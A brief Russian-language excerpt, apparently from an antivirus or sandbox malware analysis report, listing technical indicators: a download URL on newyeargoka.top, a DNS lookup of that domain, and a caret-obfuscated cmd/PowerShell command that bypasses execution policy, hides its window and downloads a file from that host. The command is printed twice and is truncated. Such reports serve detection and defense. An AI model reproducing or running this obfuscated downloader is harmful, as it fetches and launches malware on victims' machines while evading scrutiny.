Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pow^e^r^S^HeL^L.ex^e -ExE^C^utIOnpO^l^ICY ^BY^P^as^S -^NoProFiLE^ ^-windO^Wst^y^L^e^ ^H^IdDEn^ (nEw-oBJec^t Sy^s^t^e^M.NET.w^eb^clIenT)^.^doW^Nl^oadf^ile^('http://newyeargoka.top/...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /c "pow^e^r^S^HeL^L.ex^e -ExE^C^utIOnpO^l^ICY ^BY^P^as^S -^NoProFiLE^ ^-windO^Wst^y^L^e^ ^H^IdDEn^ (nEw-oBJec^t Sy^s^t^e^M.NET.w^eb^clIenT)^.^doW^Nl^oadf^ile^('http://newyeargoka.top/...' (со скрытым окном)